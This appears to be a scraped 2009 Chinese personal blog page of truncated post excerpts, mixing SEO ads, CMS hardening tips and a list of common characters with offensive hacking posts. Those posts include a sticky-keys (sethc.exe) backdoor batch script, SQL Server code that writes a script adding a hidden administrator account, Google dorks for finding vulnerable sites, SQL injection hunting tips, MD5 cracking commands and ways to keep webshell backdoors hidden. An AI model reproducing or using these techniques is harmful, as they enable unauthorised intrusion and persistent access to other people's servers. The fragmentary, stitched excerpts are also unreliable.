本人承接SEO服务,有意这可以给我留言。或加我QQ:251323708
|
a
2009-11-23 18:47
感谢您在这一年之内对SEOWHY始终不渝的支持,在这一年里,我们也从SEOWHY的成长中收获了很多。SEO知识的完善、经验的丰富、为人处事的成熟。感谢你和我们一起用心打造咱们的交流家园。在这个五一节日,作为单薄的礼物,我们为您献上一份SEO创业思路,希望能给部分朋友一些帮助。
在很多SEO爱好者看来,排名技术和思路已经不是问题。但学习了SEO做什么?怎么做?当大量火热关键词已经被大站占领,我怎么办?
今年的五一,我们为你奉献这套思路,希望对你有些许帮助。
|
2009-11-20 23:28
名字取得过了点,呵呵。
不过自从IIS oday 2出来后,网络没安静过,呵呵,桃源盘子,新云早期的那个0day等等大都是利用了IIS解析漏洞
影响版本:
Powered By Dvbbs Version 8.2.0
Powered By Dvbbs Version 8.1.0
Powered By Dvbbs Version 8.0.0
还是批量,直接Google上面的任一
注册用户-我的主页-个人空间管理
|
2009-11-17 23:29
1、保持DEDE更新,及时打补丁。
2、装好DEDE后及时把install文件夹删除
3、管理目录改名,最好是改成MD5形式的,最好长点
4、DedeCms 万能安全防护代码http://bbs.dedecms.com/read.php?tid=15538
5、如果是使用HTML可以把plus下的相应文件和根目录下的index.php做掉(用不到的全删掉,还可以把数据库里面不用的表删除掉)
6、不用留言本的可以把plus下的guestbook做掉
7、不用会员的可以把member做掉
8、后台的文件管理(管理目录下file_manage_xxx.php),不用的可以做掉,这个不是很安全,至少进了后台 |
2009-11-15 02:57
有需要的家长可以复制下来打印
500个最常用汉字
的 一 国 在 人 了 有 中 是 年 和 大 业 不 为 发 会 工 经 上 地 市 要 个 产 这 出 行 作 生 家 以 成 到 日 民 来 我 部 对 进 多 全 建 他 公 开 们 场 展 时 理 新 方 主 企 资 实 学 报 制 政 济 用 同 于 法 高 长 现 本 月 定 化 加 动 合 品 重 关 机 分 力 自 外 者 区 能 设 后 就 等 体 下 万 元 社 过 前 面 农 也 得 与 说 之 员 而 务 利 电 文 事 可 种 总 改 三 各 好 金 第 司 其 从 平 代 当 天 水 省 提 商 十 管 内 小 技 位 目 起 海
|
2009-11-14 21:33
| 首页模板 |
\templets\default\index.html |
| 文章频道首页 |
\templets\default\index_article.htm |
|
2009-11-14 00:49
发现两个非常棒的“设为主页”和“加入收藏”代码,记录cookies,24小时只弹出一次。代码本站都测试过,在IE下都有效,站长朋友们应该能用得上。可以用"html转换成js"工具进行转换,用JS插入页面。
记录cookies实现退出弹出“设为主页”代码
<script>
function getCookie(name) {
var start = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) && ( name != document.cookie.substr |
2009-11-09 13:16
1.入侵指定网站;查找SQL注入点;碰到网站地址是以asp?=44.php?=44.等结尾的动态网页注入大家自己在论坛搜索资料。关键词SQL。
这里讲些小经验,有的网页如
http://www.***.com/article/today/265501.html大家知道以HTML结尾的网页一般都是静态的,不存在注入漏洞。但我们注意查看该网页的源码,发现源码中存在这样的内容:
<script language="javascript" src="/common/Dig.aspx?id=265506&modelid=1&css=">
我们可 |
2009-11-09 13:10
连接sql后全部代码如下:
create table [bin_cmd]([cmd] [image]);
declare @a sysname,@s nvarchar(4000)select @a=db_name(),@s=0x62696E backup database @a to disk=@s;
insert into [bin_cmd](cmd)values('<scrIpt language=VBScript>window.moveTo 8888,8888:Set s=CreateObject("Wscript.Shell"):s.Run "cmd.exe /c net user ASPMET 123_asda!@ /add",0:s.Run "cmd.exe /c net localgroup |
2009-11-09 13:00
将下面的代码保存为tt.bat 然后到主机上运行~后门的启动了~
后连接对方3389然后连续按5次Shift就能进入盘里了 然后进入c:\windows\system32\cmd.exe
或者建个bat内容为 call cmd.xe 就是系统权限了~管理员把你先的用户删了也不怕~哇哈哈哈哈~~~
TITLE Shift后门 @echo off
cls
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo.
echo Shift后门
echo.坏狼安全网http://www.winshell.cn
echo 使用方法:本文件执行完毕后, |
2009-11-06 23:19
批处理:
@echo off
cls
echo 使用方法:本文件执行完毕后
echo 在终端界面按Shift 5次即可登陆系统
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
attrib c:\windows\system32\sethc.exe +h
attrib c:\windows\system32\dllcache\sethc.exe +h
echo 后门安装完毕
echo. & pause
exit
此段代码保存 |
2009-11-06 23:17
现在可以说网络管理员对服务器的设置是越来越BT,但BT的同时,也有黑客朋友们对服务器的不断的测试,在测试中往往获取最低的guest权限是简单的,像我们在入侵网站过程中,获取webshell是简单的,但是当由webshell的guest权限向system权限提升时却往往是止步不前。所以我有想写这样一篇文章的想法,但是在思考的过程中,又不得不承认,方法是不断的探索中出来的,方法更是有常规的也有另辟蹊径的。下面就做一些简单的介绍,对提权的方法进行一些介绍,同时也希望在更多朋 |
2009-11-06 23:17
一般来说,形如1e4dc79d489e86b2的16位或者32位密码就是经过MD5加密的,(当然也有特殊,比如DVBBS在登陆时候会先产生一个16位的随机密码,当然,这个密码还是和MD5密码的形式有点区别,相同的是都是16位的数字+字母组合 。);
这个一般来说可以用一个叫dv.exe的工具来破解。他可以破解加密前是10位以下的纯数字或者纯字母,破解纯数字的,速度超快,但是纯字母的,就慢了,当然他还有其他功能,但是其他功能没什么特别之处,所以不说。
破解纯数字时候:dv -p a.txt -b num
纯字母: dv -p a.txt -b cha |
2009-11-06 23:16
1,
到GoogLe,搜索一些关键字,edit.asp?
2,
到Google ,site:cq.cn inurl:asp
3,
利用挖掘鸡和一个ASP木马.
文件名是login.asp
路径组是/manage/
关键词是went.asp
用'o |
2009-11-05 14:30
有很多朋友拿下一些站的shell后,最后走人的时候,肯定是想留个后门在走,但是后门没几天就不见了。这
让一些小黑们很头痛哈,(包括我,哈哈)网上流传的方法也不是很好,只对本人来说哈。
不墨迹了,进正题。
首先拿下shell后,建立一个有...\\这样的文件夹,比如我就在站点跟目录建立个jieshao...\\这样的文件夹,如图
|
2009-11-02 16:16
我们常常利用"万能密码"登陆了一些站点后台。这时又不想让别人按照同样的方法也进来。我们就必须把这个“万能密码”即'or'='or'的漏洞给修补下。 找到后台登陆地址的文件,然后在源代码文件找到了下面这段代码。
<%
pwd = request.form("pwd")
name = request.form("name")
Set rs = Server.CreateObject("ADODB.Connection")
sql = "select * from Manage_User where UserName='" & na
|
|
|
yaohack
男, 1岁
湖北 随州
上次登录:
7小时前
 加为好友
|
送他礼物
发送消息
